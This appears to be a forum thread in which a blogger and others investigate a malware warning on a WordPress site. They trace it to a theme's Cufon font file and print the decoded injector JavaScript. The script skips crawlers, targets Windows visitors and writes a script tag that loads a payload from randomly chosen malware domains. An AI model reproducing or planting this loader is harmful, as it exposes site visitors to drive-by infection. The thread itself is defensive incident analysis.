browser? os? someone said this on twitter to ericries after he retweeted another article of mine. I looked this weekend/had others ask if they got a warning. Everyone said it was fine. Looking at the .js file now (its some cufon thing) and the source of the post as well. It's part of what im using with elegantthemes.
That writes a script tag into the document with the following payload:
var dc = document.cookie; var cname = 'watchtime'; var wn = window.navigator.userAgent; var stri = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i; var strOS = navigator.appVersion; if(dc.indexOf(cname)==-1 && !wn.toLowerCase().match(stri) && strOS.toLowerCase().indexOf('win') != -1) { var doms = ['edisonsnightclub.com','emapis.org','ideacoreportal.com','karenegren.com']; var preffs = ['aqua.','azure.','black.','blue.','brown.','gold.','gray.','green.','lime.','navy.','olive.','plum.','red.','snow.','white.','yellow.']; var dom = Math.floor(Math.random()doms.length); var pref = Math.floor(Math.random()preffs.length); dt=new Date();dt.setTime(dt.getTime() + 736003600);document.cookie=cname+'='+escape(cname)+';expires='+dt.toGMTString()+';path=/'; document.write('<script type="text/javascript" src="http://+preffs[pref]+doms[dom]+/data/mootools.js><\/...); };
I'm thinking that this is malicious (a cursory search for emapis.org shows it to be a malware site)
I'm not super familiar with cufon but this does not appear to be kosher.
As the unescaped javascript shows, it's a random chance for different sites, so it might be somewhat hard to reproduce. So far I haven't been able to pull a mootools.js from those sites to see it.
Edit: the js I'm getting back is just (function(){var error = 404;})();
wp_content/themes/LightBright/js/League_Gothic_400.font.js
Exploit link to exploit site
edit: FF 3.6.8 on Windows - AVG 9